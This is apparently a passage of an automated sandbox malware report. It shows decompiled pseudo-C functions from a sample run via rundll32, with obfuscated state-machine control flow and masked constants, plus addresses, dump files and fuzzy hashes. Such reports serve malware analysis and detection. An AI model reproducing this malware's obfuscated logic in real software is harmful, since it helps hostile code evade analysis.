						goto L18;
					}
				}
			}

0x007b044f
0x007b0459
0x007b0466
0x007b0471
0x007b0473
0x007b047a
0x007b0481
0x007b0489
0x007b0491
0x007b0496
0x007b049e
0x007b04a6
0x007b04ae
0x007b04b3
0x007b04b8
0x007b04c0
0x007b04c8
0x007b04d0
0x007b04d8
0x007b04e0
0x007b04e8
0x007b04f0
0x007b04f8
0x007b0500
0x007b0508
0x007b0510
0x007b0518
0x007b0520
0x007b0528
0x007b052d
0x007b053b
0x007b0540
0x007b0546
0x007b054e
0x007b0553
0x007b055b
0x007b0560
0x007b0564
0x007b056c
0x007b0578
0x007b057d
0x007b0583
0x007b058b
0x007b0593
0x007b059b
0x007b05a3
0x007b05ab
0x007b05b3
0x007b05bb
0x007b05c0
0x007b05c8
0x007b05d0
0x007b05db
0x007b05e6
0x007b05f1
0x007b05f9
0x007b0601
0x007b0609
0x007b0615
0x007b061a
0x007b0624
0x007b0627
0x007b0634
0x007b0637
0x007b063b
0x007b0643
0x007b064e
0x007b0656
0x007b0661
0x007b0671
0x007b0675
0x007b0681
0x007b0686
0x007b068c
0x007b0694
0x007b069c
0x007b06a4
0x007b06ac
0x007b06b9
0x007b06bc
0x007b06c0
0x007b06c8
0x007b06d0
0x007b06d8
0x007b06e8
0x007b06f0
0x007b06f3
0x007b06f7
0x007b06ff
0x007b0707
0x007b070f
0x007b0714
0x007b0719
0x007b071e
0x007b0726
0x007b072e
0x007b0736
0x007b073a
0x007b0742
0x007b074a
0x007b0752
0x007b075a
0x007b075f
0x007b0767
0x007b076f
0x007b0777
0x007b077f
0x007b0787
0x007b078f
0x007b0797
0x007b079f
0x007b07a7
0x007b07af
0x007b07b7
0x007b07bf
0x007b07c7
0x007b07cc
0x007b07d1
0x007b07d6
0x007b07de
0x007b07e6
0x007b07ee
0x007b07f6
0x007b07fe
0x007b0806
0x007b080e
0x007b0818
0x007b0820
0x007b0828
0x007b0830
0x007b0838
0x007b0845
0x007b0849
0x007b0851
0x007b0859
0x007b0859
0x007b085f
0x007b085f
0x007b0864
0x007b0864
0x007b0866
0x007b0985
0x007b099f
0x007b09a3
0x007b09a8
0x007b09ab
0x007b09af
0x007b09be
0x00000000
0x007b09b1
0x007b09b3
0x007b09b8
0x00000000
0x007b09b8
0x007b086c
0x007b0872
0x007b091a
0x007b0923
0x007b0963
0x007b0967
0x007b0970
0x007b0973
0x007b0978
0x007b09c0
0x007b09c0
0x007b09c6
0x00000000
0x007b0878
0x007b087e
0x007b08c7
0x007b08c8
0x007b08cb
0x007b08cc
0x007b08d1
0x007b08d6
0x007b08e9
0x007b08f2
0x007b08f7
0x007b08fd
0x007b0907
0x007b0909
0x007b090c
0x007b090f
0x007b0912
0x007b085f
0x00000000
0x007b0880
0x007b0882
0x007b09e7
0x007b09fa
0x007b0888
0x007b088e
0x00000000
0x007b0894
0x007b08ae
0x007b08b3
0x007b088e
0x007b0882
0x007b087e
0x007b0872
0x007b0a04
0x007b0a0d
0x007b09cb
0x007b09cb
0x007b09cb
0x00000000
0x007b09d7
0x007b085f

Strings

,, xrefs: 007B079F

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-2314114710
Opcode ID: f5e98a869a645b5463f731f4db679c38613d5eb528ce996412c3936545ae95a1
Instruction ID: 7e24745b604e008025b9ae85872ce9f195c0721e1de8d1357717c571038b4ed4
Opcode Fuzzy Hash: f5e98a869a645b5463f731f4db679c38613d5eb528ce996412c3936545ae95a1
Instruction Fuzzy Hash: DCE130725083809FD368CF25D58AA4BBBF1BBC4718F608A1DF59A86260C7B5D949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 100134F0 Relevance: 1.5, APIs: 1, Instructions: 11windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 100134FE

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Iconic
String ID:
API String ID: 110040809-0
Opcode ID: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
Instruction ID: 838b9ee9edc54b62b4d2e1430c30368496747ad900502173d0e488298d75c8b4
Opcode Fuzzy Hash: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
Instruction Fuzzy Hash: D6C012B0504208EB8704CB94D940C1977A8E74D30470002CCF80C83300D531AD008655

Uniqueness

Uniqueness Score: -1.00%

Function 007B9EEC Relevance: 1.5, Strings: 1, Instructions: 226
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E007B9EEC() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t212;
				intOrPtr _t214;
				intOrPtr _t218;
				void* _t219;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t257;
				void* _t259;
				char _t263;
				void* _t264;
				void* _t266;

				_v64 = 0xd7ee0e;
				_t257 = 0x22;
				_v64 = _v64 / _t257;
				_v64 = _v64 + 0x89a9;
				_t219 = 0;
				_v64 = _v64 ^ 0x0000b335;
				_t259 = 0xb83ebc6;
				_v96 = 0xf5dfb6;
				_v96 = _v96 >> 6;
				_t221 = 0x26;
				_v96 = _v96 / _t221;
				_t222 = 0x2d;
				_v96 = _v96 * 0x58;
				_v96 = _v96 ^ 0x000b9251;
				_v60 = 0xd70e95;
				_v60 = _v60 >> 9;
				_v60 = _v60 + 0xffffe8b9;
				_v60 = _v60 ^ 0x00062b78;
				_v44 = 0xb641ac;
				_v44 = _v44 / _t222;
				_v44 = _v44 ^ 0x0002d028;
				_v52 = 0xbf8457;
				_t223 = 0x5d;
				_v52 = _v52 / _t223;
				_v52 = _v52 | 0xbb7661a2;
				_v52 = _v52 ^ 0xbb710206;
				_v80 = 0x47b11a;
				_v80 = _v80 ^ 0xc2c4229c;
				_t224 = 0x18;
				_v80 = _v80 / _t224;
				_v80 = _v80 + 0xffff1c96;
				_v80 = _v80 ^ 0x08184a4c;
				_v36 = 0x40dca8;
				_v36 = _v36 + 0x3144;
				_v36 = _v36 ^ 0x004d2780;
				_v40 = 0xec5297;
				_v40 = _v40 * 0x45;
				_v40 = _v40 ^ 0x3fbac2f2;
				_v72 = 0x18b121;
				_v72 = _v72 >> 1;
				_v72 = _v72 * 0x1e;
				_v72 = _v72 + 0xfd79;
				_v72 = _v72 ^ 0x0173ec5f;
				_v76 = 0xd8cc67;
				_v76 = _v76 >> 2;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 * 0x23;
				_v76 = _v76 ^ 0x000d42f3;
				_v88 = 0x5f1bd9;
				_v88 = _v88 + 0x89b3;
				_v88 = _v88 ^ 0xee5f73f3;
				_v88 = _v88 ^ 0xfa82a5ad;
				_v88 = _v88 ^ 0x14801a76;
				_v92 = 0x778c42;
				_t225 = 0x6d;
				_v92 = _v92 * 0x69;
				_v92 = _v92 << 0xb;
				_v92 = _v92 | 0xba472be1;
				_v92 = _v92 ^ 0xfe7d7315;
				_v56 = 0x5dd318;
				_v56 = _v56 / _t257;
				_v56 = _v56 << 0xc;
				_v56 = _v56 ^ 0x2c2721c6;
				_v84 = 0xd870dc;
				_v84 = _v84 >> 0x10;
				_v84 = _v84 | 0x1345b487;
				_v84 = _v84 * 0x5a;
				_v84 = _v84 ^ 0xc68bf031;
				_v48 = 0x9a419e;
				_v48 = _v48 | 0xfa3afde2;
				_v48 = _v48 ^ 0xfabdbed6;
				_v32 = 0x7a1ab;
				_v32 = _v32 / _t225;
				_v32 = _v32 ^ 0x000f5e95;
				_v68 = 0x67bbab;
				_v68 = _v68 + 0xffffccf8;
				_v68 = _v68 ^ 0x5c1ded32;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x4cb92f41;
				_t263 = _v28;
				_t258 = _v28;
				goto L1;
				do {
					while(1) {
						L1:
						_t266 = _t259 - 0xc23b37f;
						if(_t266 > 0) {
							break;
						}
						if(_t266 == 0) {
							E007B8519(_v56, _v84, _v24);
							_t259 = 0xdb1153f;
							continue;
						}
						if(_t259 == 0xab8c2) {
							_t209 =  *0x7c3e10; // 0x0
							E007A8ECE(_v8 + 1, _t209 + 0x1c, _v12, _v92);
							_t212 =  *0x7c3e10; // 0x0
							_t234 = _v16;
							_t264 = _t264 + 0xc;
							_t219 = 1;
							_t259 = 0xc23b37f;
							 *((intOrPtr*)(_t212 + 0xc)) = _v16;
							continue;
						}
						if(_t259 == 0x26dca52) {
							_t234 = _v96;
							_t214 = E007AA9CE(_v96, _t263,  &_v28, _v60, _v44);
							_t258 = _t214;
							_t264 = _t264 + 0xc;
							if(_t214 == 0) {
								goto L22;
							}
							_t259 = 0xe747a68;
							continue;
						}
						if(_t259 == 0xa9b692f) {
							_t263 = E007AF899(_t234);
							_t259 = 0x26dca52;
							continue;
						}
						if(_t259 != 0xb83ebc6) {
							goto L21;
						} else {
							_t259 = 0xa9b692f;
							continue;
						}
					}
					if(_t259 == 0xdb1153f) {
						E007A4E7D(_v48, _v32, _t258, _v68);
						_t259 = 0xdb3b1d3;
						goto L21;
					}
					if(_t259 == 0xe566670) {
						_t207 = E007B894B( &_v16,  &_v24, _v36, _v40, _v72, _v76);
						_t264 = _t264 + 0x10;
						asm("sbb esi, esi");
						_t259 = ( ~_t207 & 0xf3e70543) + 0xc23b37f;
						goto L1;
					}
					if(_t259 != 0xe747a68) {
						goto L21;
					}
					_t259 = 0xdb1153f;
					if(_v28 > 2) {
						_t218 = E007A4346( &_v20, _v52,  *((intOrPtr*)(_t258 + 8)), _v80);
						_v24 = _t218;
						_pop(_t234);
						if(_t218 != 0) {
							_t259 = 0xe566670;
						}
					}
					goto L1;
					L21:
				} while (_t259 != 0xdb3b1d3);
				L22:
				return _t219;
			}

0x007b9eef
0x007b9f03
0x007b9f08
0x007b9f0e
0x007b9f16
0x007b9f18
0x007b9f20
0x007b9f25
0x007b9f2d
0x007b9f36
0x007b9f3b
0x007b9f46
0x007b9f49
0x007b9f4d
0x007b9f55
0x007b9f5d
0x007b9f62
0x007b9f6a
0x007b9f72
0x007b9f82
0x007b9f86
0x007b9f8e
0x007b9f9a
0x007b9f9f
0x007b9fa5
0x007b9fad
0x007b9fb5
0x007b9fbd
0x007b9fc9
0x007b9fcc
0x007b9fd0
0x007b9fd8
0x007b9fe0
0x007b9fe8
0x007b9ff0
0x007b9ff8
0x007ba005
0x007ba009
0x007ba011
0x007ba019
0x007ba022
0x007ba026
0x007ba02e
0x007ba036
0x007ba03e
0x007ba043
0x007ba04d
0x007ba051
0x007ba059
0x007ba061
0x007ba069
0x007ba071
0x007ba079
0x007ba081
0x007ba092
0x007ba093
0x007ba097
0x007ba09c
0x007ba0a4
0x007ba0ac
0x007ba0bc
0x007ba0c0
0x007ba0c5
0x007ba0cd
0x007ba0d5
0x007ba0da
0x007ba0e7
0x007ba0eb
0x007ba0f3
0x007ba0fb
0x007ba103
0x007ba10b
0x007ba119
0x007ba11d
0x007ba125
0x007ba12d
0x007ba135
0x007ba13d
0x007ba142
0x007ba14a
0x007ba14e
0x007ba14e
0x007ba152
0x007ba152
0x007ba152
0x007ba152
0x007ba158
0x00000000
0x00000000
0x007ba15e
0x007ba216
0x007ba21c
0x00000000
0x007ba21c
0x007ba16a
0x007ba1d5
0x007ba1e9
0x007ba1ee
0x007ba1f5
0x007ba1f9
0x007ba1fc
0x007ba1fd
0x007ba202
0x00000000
0x007ba202
0x007ba172
0x007ba1af
0x007ba1b4
0x007ba1b9
0x007ba1bb
0x007ba1c0
0x00000000
0x00000000
0x007ba1c6
0x00000000
0x007ba1c6
0x007ba17a
0x007ba198
0x007ba19a
0x00000000
0x007ba19a
0x007ba182
0x00000000
0x007ba188
0x007ba188
0x00000000
0x007ba188
0x007ba182
0x007ba22c
0x007ba2c6
0x007ba2cd
0x00000000
0x007ba2cd
0x007ba238
0x007ba29a
0x007ba29f
0x007ba2a6
0x007ba2ae
0x00000000
0x007ba2ae
0x007ba240
0x00000000
0x00000000
0x007ba24b
0x007ba250
0x007ba265
0x007ba26a
0x007ba26f
0x007ba272
0x007ba278
0x007ba278
0x007ba272
0x00000000
0x007ba2d2
0x007ba2d2
0x007ba2e1
0x007ba2e7

Strings

D1, xrefs: 007B9FE8

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: D1
API String ID: 0-2215811268
Opcode ID: 4d88bf68b84df9634e80d55b10f02a9e22a7f7d13ede0c9cbb4bd4fee70812fc
Instruction ID: 9f9fc25820ea030c4814294d8107a5eb8ae512e6a2a44094c392d9ab0305f4e6
Opcode Fuzzy Hash: 4d88bf68b84df9634e80d55b10f02a9e22a7f7d13ede0c9cbb4bd4fee70812fc
Instruction Fuzzy Hash: 94A152729083049FC358DF69C48954BFBF1BBC4354F14892EF5A996220D7B9CA498F87

Uniqueness

Uniqueness Score: -1.00%

Function 007BBB23 Relevance: 1.4, Strings: 1, Instructions: 173
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E007BBB23(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t138;
				intOrPtr _t161;
				void* _t162;
				void* _t164;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				void* _t185;
				signed int* _t189;

				_t162 = __ecx;
				_push(1);
				_push(1);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t138);
				_v16 = 0xdfc885;
				_t189 =  &(( &_v76)[8]);
				asm("stosd");
				_t185 = 0;
				_t164 = 0xcc97672;
				asm("stosd");
				asm("stosd");
				_v32 = 0x60c2fa;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x00046f58;
				_v76 = 0xb548f0;
				_v76 = _v76 >> 0xc;
				_t181 = 0xc;
				_v76 = _v76 * 0x3c;
				_v76 = _v76 + 0xffff64d0;
				_v76 = _v76 ^ 0x0001fd54;
				_v52 = 0x15927a;
				_v52 = _v52 / _t181;
				_v52 = _v52 ^ 0x000151ae;
				_v56 = 0xd6ed9;
				_t182 = 0x1a;
				_v56 = _v56 * 0x3f;
				_v56 = _v56 + 0xfffffbb4;
				_v56 = _v56 ^ 0x0345d46e;
				_v64 = 0xba2b53;
				_v64 = _v64 * 0x6d;
				_v64 = _v64 ^ 0x73d6d9cf;
				_v64 = _v64 * 0x31;
				_v64 = _v64 ^ 0x981330b4;
				_v60 = 0x269f8;
				_v60 = _v60 >> 5;
				_v60 = _v60 + 0xffffb859;
				_v60 = _v60 ^ 0xfff00afd;
				_v68 = 0xfd9147;
				_v68 = _v68 ^ 0x8de1643f;
				_v68 = _v68 / _t182;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000df039;
				_v72 = 0x5def36;
				_v72 = _v72 | 0xd620e1c7;
				_v72 = _v72 + 0xd307;
				_t183 = 0x48;
				_v72 = _v72 / _t183;
				_v72 = _v72 ^ 0x02f0e4dc;
				_v24 = 0xf7704c;
				_v24 = _v24 + 0x27dd;
				_v24 = _v24 ^ 0x00ff74b2;
				_v28 = 0x151ed9;
				_v28 = _v28 * 0x48;
				_v28 = _v28 ^ 0x05f046e2;
				_v36 = 0xddc4df;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 | 0x7f83127d;
				_v36 = _v36 ^ 0x7f8e5ab1;
				_v40 = 0x29fd7f;
				_v40 = _v40 >> 7;
				_v40 = _v40 | 0x8d3b2756;
				_v40 = _v40 ^ 0x8d37b79a;
				_v44 = 0x8dc5a8;
				_v44 = _v44 * 0x63;
				_v44 = _v44 >> 4;
				_v44 = _v44 ^ 0x036b3557;
				_v48 = 0xd61f7e;
				_v48 = _v48 | 0xd43d52c3;
				_v48 = _v48 + 0xa376;
				_v48 = _v48 ^ 0xd504b7b0;
				_t184 = _v20;
				while(_t164 != 0x2524be6) {
					if(_t164 == 0xcc97672) {
						_t164 = 0xe41debb;
						continue;
					} else {
						if(_t164 == 0xdd773d9) {
							if(E007BD8EC(_v52, _v56,  &_v20, _t184) != 0) {
								_t164 = 0xe01b1ec;
								continue;
							}
						} else {
							if(_t164 == 0xe01b1ec) {
								E007C0AC8(_v64, _v60, 1, _v68, _v20, _v72, _a12, _t162, _v24, 1, _t164, _v28);
								_t189 =  &(_t189[0xa]);
								_t164 = 0x2524be6;
								_t185 =  !=  ? 1 : _t185;
								continue;
							} else {
								if(_t164 != 0xe41debb) {
									L13:
									if(_t164 != 0x78a313b) {
										continue;
									}
								} else {
									_t161 = E007A3DE2(_t164);
									_t184 = _t161;
									if(_t161 != 0xffffffff) {
										_t164 = 0xdd773d9;
										continue;
									}
								}
							}
						}
					}
					return _t185;
				}
				E007B1E67(_v36, _v40, _v44, _v48, _v20);
				_t189 =  &(_t189[3]);
				_t164 = 0x78a313b;
				goto L13;
			}

0x007bbb2c
0x007bbb2f
0x007bbb30
0x007bbb31
0x007bbb35
0x007bbb39
0x007bbb3d
0x007bbb41
0x007bbb42
0x007bbb43
0x007bbb48
0x007bbb56
0x007bbb59
0x007bbb5c
0x007bbb5e
0x007bbb65
0x007bbb66
0x007bbb67
0x007bbb6f
0x007bbb74
0x007bbb7c
0x007bbb84
0x007bbb8e
0x007bbb91
0x007bbb95
0x007bbb9d
0x007bbba5
0x007bbbbd
0x007bbbc1
0x007bbbc9
0x007bbbd6
0x007bbbd9
0x007bbbdd
0x007bbbe5
0x007bbbed
0x007bbbfa
0x007bbbfe
0x007bbc0b
0x007bbc0f
0x007bbc17
0x007bbc1f
0x007bbc24
0x007bbc2c
0x007bbc34
0x007bbc3c
0x007bbc4c
0x007bbc50
0x007bbc55
0x007bbc5d
0x007bbc65
0x007bbc6d
0x007bbc79
0x007bbc7c
0x007bbc80
0x007bbc88
0x007bbc90
0x007bbc98
0x007bbca0
0x007bbcad
0x007bbcb1
0x007bbcb9
0x007bbcc1
0x007bbcc6
0x007bbcce
0x007bbcd6
0x007bbcde
0x007bbce3
0x007bbceb
0x007bbcf3
0x007bbd00
0x007bbd04
0x007bbd09
0x007bbd11
0x007bbd19
0x007bbd21
0x007bbd29
0x007bbd31
0x007bbd35
0x007bbd47
0x007bbde6
0x00000000
0x007bbd4d
0x007bbd53
0x007bbdda
0x007bbddc
0x00000000
0x007bbddc
0x007bbd55
0x007bbd5b
0x007bbdac
0x007bbdb1
0x007bbdb4
0x007bbdbb
0x00000000
0x007bbd5d
0x007bbd63
0x007bbe11
0x007bbe17
0x00000000
0x00000000
0x007bbd69
0x007bbd71
0x007bbd76
0x007bbd7b
0x007bbd81
0x00000000
0x007bbd81
0x007bbd7b
0x007bbd63
0x007bbd5b
0x007bbd53
0x007bbe26
0x007bbe26
0x007bbe04
0x007bbe09
0x007bbe0c
0x00000000

Strings

6], xrefs: 007BBC5D

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 6]
API String ID: 0-3974934468
Opcode ID: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
Instruction ID: 80b7e548b852b35ead5df47947169354ab6d9855480bb9e5ba7328b6898f526e
Opcode Fuzzy Hash: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
Instruction Fuzzy Hash: 75713071208341AFC358CF25C88951BBBE5FFC9758F504A1DFA9696260D37ACA498F43

Uniqueness

Uniqueness Score: -1.00%

Function 007A5361 Relevance: 1.4, Strings: 1, Instructions: 124
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E007A5361(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				unsigned int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				void* __edx;
				void* _t84;
				void* _t104;
				void* _t118;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				void* _t124;
				signed int* _t127;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E007B20B9(_t84);
				_v4 = 0x18047d;
				_t127 =  &(( &_v32)[5]);
				_v4 = _v4 >> 0xa;
				_v4 = _v4 ^ 0x000d3248;
				_t124 = 0;
				_v28 = 0x90acd4;
				_t104 = 0x35df4ed;
				_v28 = _v28 >> 5;
				_v28 = _v28 + 0xffff3107;
				_v28 = _v28 | 0xd0f9b279;
				_v28 = _v28 ^ 0xd0f1daef;
				_v8 = 0x9d14b7;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x027823b1;
				_v32 = 0xfd6947;
				_v32 = _v32 + 0xffff03bf;
				_t120 = 0x72;
				_v32 = _v32 / _t120;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00066e44;
				_v16 = 0x111da;
				_v16 = _v16 ^ 0xdd7c73d4;
				_v16 = _v16 | 0x7d37165e;
				_v16 = _v16 ^ 0xfd769a76;
				_v12 = 0x2531de;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0xa63e9142;
				_v20 = 0x6e0002;
				_v20 = _v20 >> 0xe;
				_t121 = 0xe;
				_v20 = _v20 / _t121;
				_t122 = 0x3d;
				_v20 = _v20 * 0x64;
				_v20 = _v20 ^ 0x000bef19;
				_v24 = 0xa3fc95;
				_v24 = _v24 + 0xdcd1;
				_v24 = _v24 << 3;
				_v24 = _v24 / _t122;
				_v24 = _v24 ^ 0x0013a2ec;
				while(_t104 != 0x311781) {
					if(_t104 == 0x35df4ed) {
						_push(_t104);
						_push(_t104);
						_t118 = 0x28;
						 *0x7c3e08 = E007A7FF2(_t118);
						_t104 = 0x605992c;
						continue;
					} else {
						if(_t104 == 0x477ef52) {
							E007A924B();
							_t104 = 0x311781;
							continue;
						} else {
							if(_t104 == 0x605992c) {
								if(E007C0F33() != 0) {
									_t104 = 0xdb1ba22;
									continue;
								}
							} else {
								if(_t104 != 0xdb1ba22) {
									L13:
									if(_t104 != 0x5723dc8) {
										continue;
									}
								} else {
									_t124 = E007A960D(_v16, _a12, _a8, _v12);
									_t127 =  &(_t127[3]);
									if(_t124 == 0) {
										_t104 = 0x477ef52;
										continue;
									}
								}
							}
						}
					}
					return _t124;
				}
				E007B8519(_v20, _v24,  *0x7c3e08);
				_t104 = 0x5723dc8;
				goto L13;
			}

0x007a5368
0x007a536c
0x007a5370
0x007a5376
0x007a537b
0x007a5383
0x007a5386
0x007a538d
0x007a5395
0x007a5397
0x007a539f
0x007a53a4
0x007a53ae
0x007a53bb
0x007a53c3
0x007a53cb
0x007a53d3
0x007a53d8
0x007a53e0
0x007a53e8
0x007a53f6
0x007a53fb
0x007a5401
0x007a5406
0x007a540e
0x007a5416
0x007a541e
0x007a5426
0x007a542e
0x007a5436
0x007a543b
0x007a5443
0x007a544b
0x007a5454
0x007a5459
0x007a5464
0x007a5465
0x007a5469
0x007a5471
0x007a5479
0x007a5481
0x007a5491
0x007a5495
0x007a549d
0x007a54a7
0x007a5501
0x007a5502
0x007a5505
0x007a550d
0x007a5512
0x00000000
0x007a54a9
0x007a54ab
0x007a54ec
0x007a54f1
0x00000000
0x007a54ad
0x007a54b3
0x007a54e6
0x007a54e8
0x00000000
0x007a54e8
0x007a54b5
0x007a54b7
0x007a5532
0x007a5538
0x00000000
0x00000000
0x007a54b9
0x007a54d2
0x007a54d4
0x007a54d9
0x007a54db
0x00000000
0x007a54db
0x007a54d9
0x007a54b7
0x007a54b3
0x007a54ab
0x007a5547
0x007a5547
0x007a5527
0x007a552d
0x00000000

Strings

H2, xrefs: 007A538D

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: H2
API String ID: 0-302591398
Opcode ID: ec878486df7c4e9389f26013415a704b0da0ec3cbaa9fc276d4c2feeded5b04f
Instruction ID: 22d1065b424f7291bb0e0bb680677000f199a491312f363eb49bca3a9bf0c9f9
Opcode Fuzzy Hash: ec878486df7c4e9389f26013415a704b0da0ec3cbaa9fc276d4c2feeded5b04f
Instruction Fuzzy Hash: 7141BC32608340DFC728CF25E44991FBBE2EBD8718F104A1DF58556220D7B8CA88CB87

Uniqueness

Uniqueness Score: -1.00%

Function 007A8B3D Relevance: 1.4, Strings: 1, Instructions: 109
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E007A8B3D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t83;
				void* _t89;
				signed int _t93;
				void* _t96;
				void* _t108;
				void* _t109;
				void* _t111;
				void* _t112;

				_push(_a16);
				_t108 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t83);
				_v72 = 0xbb1237;
				_t112 = _t111 + 0x18;
				_v72 = _v72 >> 0xf;
				_v72 = _v72 + 0xd544;
				_t109 = 0;
				_v72 = _v72 ^ 0x000eb3e9;
				_t96 = 0x815a082;
				_v48 = 0x50cb35;
				_v48 = _v48 + 0xffff87ec;
				_v48 = _v48 ^ 0x00585237;
				_v52 = 0xa4cd83;
				_v52 = _v52 ^ 0x5b114d95;
				_v52 = _v52 ^ 0x5bb6524d;
				_v56 = 0xbe8ecf;
				_v56 = _v56 << 0xe;
				_v56 = _v56 ^ 0xa3b0842f;
				_v60 = 0x771210;
				_v60 = _v60 | 0x3e44f288;
				_v60 = _v60 ^ 0x3e758d5b;
				_v80 = 0xf3b10d;
				_v80 = _v80 ^ 0x3cb59f0c;
				_v80 = _v80 >> 4;
				_v80 = _v80 + 0xffffd90b;
				_v80 = _v80 ^ 0x03c55d5e;
				_v64 = 0x352515;
				_v64 = _v64 ^ 0x7339bda5;
				_v64 = _v64 + 0x1326;
				_v64 = _v64 ^ 0x7306d08c;
				_v68 = 0x4f62f3;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x83faab25;
				_v68 = _v68 ^ 0x6fa8977d;
				_v76 = 0x2ac691;
				_v76 = _v76 << 9;
				_t93 = 0x6b;
				_v76 = _v76 / _t93;
				_v76 = _v76 << 0xc;
				_v76 = _v76 ^ 0xcae566b9;
				do {
					while(_t96 != 0x54856a9) {
						if(_t96 == 0x815a082) {
							_t96 = 0x54856a9;
							continue;
						} else {
							if(_t96 == 0xa9da54a) {
								_t89 = E007BD97D( &_v44, _v56, __eflags, _v60, _t108 + 0x18, _v80);
								_t112 = _t112 + 0xc;
								__eflags = _t89;
								if(__eflags != 0) {
									_t96 = 0xefea9c1;
									continue;
								}
							} else {
								_t118 = _t96 - 0xefea9c1;
								if(_t96 != 0xefea9c1) {
									goto L11;
								} else {
									E007BD97D( &_v44, _v64, _t118, _v68, _t108 + 0xc, _v76);
									_t109 =  !=  ? 1 : _t109;
								}
							}
						}
						L6:
						return _t109;
					}
